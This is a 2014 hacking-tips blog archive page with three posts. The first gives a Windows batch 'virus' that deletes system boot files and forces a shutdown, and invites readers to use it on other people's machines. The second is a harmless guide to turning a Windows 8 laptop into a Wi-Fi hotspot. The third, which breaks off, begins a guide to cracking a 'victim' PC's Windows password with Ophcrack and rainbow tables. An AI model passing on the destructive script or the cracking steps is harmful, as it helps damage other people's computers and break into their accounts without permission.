Skip to main content

Posts

Showing posts from May, 2014

Virus that crashes the computer!!!

Okay so now ,you want to create a virus that crashes the computer. There are many tricks available but i find it the simplest one. So follow me on this : 1. Open notepad and copy paste the following code. 2. @echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini @echo off msg * YOU GOT OWNED!!! shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive 3.  save it as .bat file .  Note: DO NOT RUN IT ON YOUR OWN PC OR ELSE IT WILL CRASH. Generally or i would say almost always virus when created through notepad have an .bat extension. Enjoy!!!

Convert Windows 8 PC/Laptop into wi-fi hotspot

Follow these steps to successfully convert your Windows 8 PC/Laptop into wi-fi hotspot Step.1: Open run (windows key+R), type ncpa.npl. Step.2: A new window is in front of you. There select wireless Network adapter and sharing center and select properties. Step.3: In wifi properties Select share, followed by Allow Others Network users to connect. Note- Never Tick 2nd Option. Step.4: Now Open Command Promote As administrative. Step.5: Don’t worry by looking in below Command promote codes in picture, those are very simple. You need to copy and paste below command in command prompt. “netsh wlan set hostednetwork mode=allow ssid=”techbymak” key=”techbymak”“ You will see SSid which is actually your network name, which we are going to create. Step.6:Now you need to start the network By using below command. “netsh wlan start hostednetwork” Every thing is done. Now you can observe your laptop is working like a router. Note:To check How many Devices Are connected to

Hack Windows Password

Using Ophcrack,You can crack account password of almost all the Windows till date,And since OphCrack is the fastest password cracking tool,it wont take more than 4-5 minutes to crack a password.So let's begin What Do You Need ? BackTrack 5 Live DVD. Rainbow Files (i'll tell you what it is.) Physical Access to victim PC. So What-The-Hell is Rainbow Files ? First thing that pops in mind when reading rainbow files is the collection of rainbows and unicorns flying,but no,Rainbow Files/Tables are basically huge sets of precomputed tables filled with hash values that are pre-matched to possible plaintext passwords. The Rainbow Tables essentially allow hackers to reverse the hashing function to determine what the plaintext password might be. It's possible for two different passwords to result in the same hash so it's not important to find out what the original password was, just as long as it has the same hash. The plaintext password may not even be the same passwor